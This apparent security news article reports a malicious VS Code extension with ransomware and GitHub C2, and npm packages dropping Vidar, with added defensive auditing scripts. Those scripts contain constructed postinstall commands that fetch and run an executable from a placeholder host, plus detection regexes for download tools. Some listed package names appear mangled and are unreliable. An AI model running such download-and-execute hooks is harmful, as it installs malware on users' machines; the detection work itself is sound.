Vibe-coded malicious VS Code extension detected with embedded ransomware capabilities

Cybersecurity researchers have reported a malicious Visual Studio Code (VS Code) extension with basic ransomware capabilities that appears to have been created using artificial intelligence, in other words, vibe-coded.

Secure Annex researcher John Tuckner, who reported the “susvsex” extension, said it made no attempt to hide its malicious functionality. The extension was uploaded on November 5, 2025 by a user named “suspublisher18” with the description “Just testing” and the email address “donotsupport@example[.]com”.

“Automatically zips, uploads, and encrypts files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch,” reads the extension’s description. As of November 6, Microsoft has removed it from the official VS Code Extension Marketplace.

According to details shared by ‘suspublisher18’, the extension is designed to activate on any event, including the installation or launch of VS Code, and to invoke a function named ‘zipUploadAndEncrypt’, which creates a ZIP archive of a target directory, exfiltrates it to a remote server, and then replaces the files with their encrypted versions.

“Fortunately, TARGET_DIRECTORY is configured to be a test directory, so it would have little impact at the moment, but it is easily updated with an extension version or as a command sent through the C2 channel discussed next,” Tuckner said.

Besides encryption, the extension also uses GitHub as a command-and-control (C2) channel: it polls a private GitHub repository for new commands to execute by parsing the repository’s “index.html” file, and writes the results of running them back to the same repository in the “requirements.txt” file, using a GitHub access token embedded in the extension’s code.

The GitHub account associated with the repository, aykhanmv, remains active; its owner claims to be based in Baku, Azerbaijan.

“Superfluous comments that detail features, README files with execution instructions, and placeholder variables are clear signs of ‘vibe coded’ malware,” Tuckner said. “The extension package accidentally included decryption tools, command-and-control server code, and GitHub access keys to the C2 server, which others could use to take over the C2.”
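The traits described above (an extension that activates on every event, carries a hardcoded GitHub token, and bundles crypto and GitHub API calls) can be checked mechanically before an extension is allowed into a developer image. The following is an added example written for this page, not Secure Annex’s tooling and not code from the “susvsex” extension. It takes an unpacked extension as a dict of path to file contents (standing in for the contents of a VSIX); the sample extension, its names and the token inside it are constructed for the demo, and the token regex is an assumption about the shape of GitHub tokens, not a validity check.

```python
"""Audit an unpacked VS Code extension for broad activation, embedded
GitHub tokens, and code markers associated with exfiltrate-and-encrypt
behaviour.  Added example; not the extension's or the researcher's code."""
import json
import re

# Assumed token shapes: classic PATs are "ghp_" + 36 alphanumerics,
# fine-grained PATs start with "github_pat_".
GITHUB_TOKEN_RE = re.compile(
    r"\b(?:ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b"
)
# Activation events that fire on every VS Code start, regardless of what
# the user opens.  "*" is the pattern the text describes.
BROAD_ACTIVATION = {"*", "onStartupFinished"}
# Loose code markers: encryption, GitHub API access, archiving, shell-out.
SUSPICIOUS_MARKERS = ("createCipheriv", "api.github.com/repos", "archiver", "child_process")


def audit_extension(files: dict) -> dict:
    """Return name, publisher and a list of (kind, path, detail) findings."""
    manifest = json.loads(files["package.json"])
    findings = []

    broad = sorted(set(manifest.get("activationEvents", [])) & BROAD_ACTIVATION)
    if broad:
        findings.append(("broad_activation", "package.json", ",".join(broad)))

    for path, text in files.items():
        if path == "package.json":
            continue
        for m in GITHUB_TOKEN_RE.finditer(text):
            # Never log the full secret; keep a short prefix for triage.
            findings.append(("embedded_github_token", path, m.group()[:8] + "..."))
        for marker in SUSPICIOUS_MARKERS:
            if marker in text:
                findings.append(("suspicious_marker", path, marker))

    return {
        "name": manifest.get("name"),
        "publisher": manifest.get("publisher"),
        "findings": findings,
    }


# --- constructed sample input (hypothetical names, fake token) -------------
FAKE_TOKEN = "ghp_" + "0123456789abcdef" * 2 + "0123"  # 36 chars after prefix

SAMPLE_EXTENSION = {
    "package.json": json.dumps({
        "name": "sample-ext",
        "publisher": "sample-publisher",
        "activationEvents": ["*"],
        "main": "./extension.js",
    }),
    "extension.js": f'''const crypto = require("crypto");
const TOKEN = "{FAKE_TOKEN}";  // constructed, not a real credential
async function poll() {{
  const r = await fetch("https://api.github.com/repos/example/c2/contents/index.html",
                        {{ headers: {{ Authorization: "token " + TOKEN }} }});
  return r.json();
}}
function encrypt(buf, key, iv) {{
  return crypto.createCipheriv("aes-256-cbc", key, iv).update(buf);
}}
''',
}

CLEAN_EXTENSION = {
    "package.json": json.dumps({
        "name": "hello-ext",
        "publisher": "sample-publisher",
        "activationEvents": ["onCommand:hello.run"],
        "main": "./extension.js",
    }),
    "extension.js": 'exports.activate = () => { console.log("hello"); };\n',
}

if __name__ == "__main__":
    for kind, path, detail in audit_extension(SAMPLE_EXTENSION)["findings"]:
        print(f"{kind:24} {path:14} {detail}")
```

Run over a real extension, unzip the VSIX and feed `extension/package.json` plus every `.js` file under `extension/`; anything that trips `broad_activation` together with an embedded token deserves a manual read of the code before it goes anywhere near a developer workstation.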

Trojanized npm packages drop Vidar Infostealer

The disclosure comes as Datadog Security Labs discovered 17 npm packages that masquerade as innocuous software development kits (SDKs) and do provide the advertised functionality, but are also designed to stealthily run Vidar Stealer on infected systems. This marks the first time the information stealer has been distributed through the npm registry.

The cybersecurity company, which tracks the cluster as MUT-4831, said some of the packages were first published on October 21, 2025, with further uploads recorded the following day and on October 26. The packages, published by accounts named “aartje” and “saliii229911”, are listed below:

  • ap-api
  • bael-good-admin
  • bael-god-api
  • Bael-god-thank you
  • botty-fork-baby
  • cursor-ai-fork
  • cursor-application-fork
  • custom telegram-bot-api
  • personalized-tg-bot-plan
  • icon-react-fork
  • react-icon-pkg
  • sabaoa-tg-api
  • oppressed at the same time
  • sai-tg-api
  • authorize-tg-api
  • telegram-bot-start
  • telegram-bot-starter

Although both accounts have since been banned, the libraries were downloaded at least 2,240 times before removal. Datadog noted, however, that many of these downloads are likely attributable to automated scrapers.

The attack chain itself is simple: a post-install script declared in the package’s “package.json” file downloads a ZIP archive from an external server (“bullethost[.]cloud”) and runs the Vidar executable it contains. The Vidar 2.0 samples were found to use hardcoded Telegram and Steam accounts as dead drop resolvers to retrieve the address of the actual C2 server.

In some variants, a PowerShell post-install script embedded directly in package.json downloads the ZIP archive, after which control is handed to a JavaScript file that completes the remaining steps of the attack.
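Both variants described above hinge on an npm lifecycle hook that downloads something and runs it, which is exactly what a pre-install gate can look for. The example below is added for this page; it is not Datadog’s tooling and not MUT-4831’s code. It parses a package.json, inspects the `preinstall`/`install`/`postinstall`/`prepare` hooks, and grades them by whether they fetch remote content, launch a binary or shell, or merely hand off to a local script that must then be read. The sample manifests mirror the two shapes the text describes (a fetch-unzip-run one-liner, and an inline PowerShell stage followed by a JavaScript file); their package names, hostnames and file names are placeholders.

```python
"""Grade npm lifecycle scripts for download-and-execute behaviour.
Added example; not Datadog's or the malware's code.  Sample manifests
below are constructed; 'payload.example' is a placeholder host."""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Things that pull content from the network.
DOWNLOADERS = re.compile(
    r"\bcurl\b|\bwget\b|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|"
    r"DownloadFile|DownloadString|fetch\(", re.I)
# Things that run a binary, unpack an archive, or spawn a shell interpreter.
EXECUTORS = re.compile(
    r"\.exe\b|Start-Process|Expand-Archive|\bunzip\b|\biex\b|Invoke-Expression|"
    r"\bpowershell\b|\bpwsh\b|\bcmd(?:\.exe)?\s+/c", re.I)
# Base64-encoded PowerShell command line (-e / -enc / -EncodedCommand).
ENCODED_PS = re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
# Hook that only runs a local JS file: the payload may be in that file.
LOCAL_SCRIPT = re.compile(r"^\s*node\s+(\S+\.js)\s*$")
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


def audit_lifecycle_scripts(manifest_json: str) -> list:
    """Return one finding per risky lifecycle hook, with a severity."""
    scripts = json.loads(manifest_json).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        downloads = bool(DOWNLOADERS.search(cmd))
        executes = bool(EXECUTORS.search(cmd))
        encoded = bool(ENCODED_PS.search(cmd))
        local = LOCAL_SCRIPT.match(cmd)
        if (downloads and executes) or encoded:
            severity = "high"      # fetch-and-run, or obfuscated PowerShell
        elif downloads or executes:
            severity = "medium"    # one half of the pattern; inspect
        elif local:
            severity = "review"    # harmless-looking, but read that file
        else:
            continue
        findings.append({
            "hook": hook,
            "command": cmd,
            "severity": severity,
            "urls": URL_RE.findall(cmd),
            "local_script": local.group(1) if local else None,
        })
    return findings


# --- constructed sample manifests -------------------------------------------
SAMPLE_DOWNLOAD_AND_RUN = json.dumps({
    "name": "sample-tg-api", "version": "1.0.0",
    "scripts": {"postinstall":
        "curl -s https://payload.example/pkg.zip -o %TEMP%\\pkg.zip && "
        "tar -xf %TEMP%\\pkg.zip -C %TEMP% && %TEMP%\\update.exe"},
})
SAMPLE_INLINE_POWERSHELL = json.dumps({
    "name": "sample-bot-starter", "version": "1.0.0",
    "scripts": {"postinstall":
        'powershell -NoProfile -Command "Invoke-WebRequest https://payload.example/pkg.zip '
        '-OutFile $env:TEMP\\pkg.zip; Expand-Archive $env:TEMP\\pkg.zip $env:TEMP" '
        '&& node stage2.js'},
})
SAMPLE_LOCAL_STAGE = json.dumps({
    "name": "sample-react-icons", "version": "1.0.0",
    "scripts": {"postinstall": "node scripts/postinstall.js"},
})
SAMPLE_CLEAN = json.dumps({
    "name": "sample-lib", "version": "1.0.0",
    "scripts": {"build": "tsc -p .", "test": "jest"},
})

if __name__ == "__main__":
    for name, manifest in [("download-and-run", SAMPLE_DOWNLOAD_AND_RUN),
                           ("inline-powershell", SAMPLE_INLINE_POWERSHELL),
                           ("local-stage", SAMPLE_LOCAL_STAGE),
                           ("clean", SAMPLE_CLEAN)]:
        for f in audit_lifecycle_scripts(manifest):
            print(f"{name:18} {f['hook']:12} {f['severity']:7} {f['urls']}")
```

A gate like this belongs in CI or a pre-install hook, not only in a human’s hands; and independent of any scanner, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops lifecycle hooks from running at all, which defeats every variant described above at the cost of breaking packages that legitimately build native code on install.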

“It is unclear why MUT-4831 chose to modify the post-installation script in this manner,” said security researchers Tesnim Hamdouni, Ian Kretz and Sebastian Obregoso. “One possible explanation is that diversification of implementations may be advantageous to the malicious actor in terms of surviving detection.”

This discovery is one more in a long list of supply chain attacks targeting open source ecosystems such as npm, PyPI, RubyGems, and Open VSX, making it crucial that developers do their due diligence: review changelogs, and watch for techniques like typosquatting and dependency confusion before installing packages.
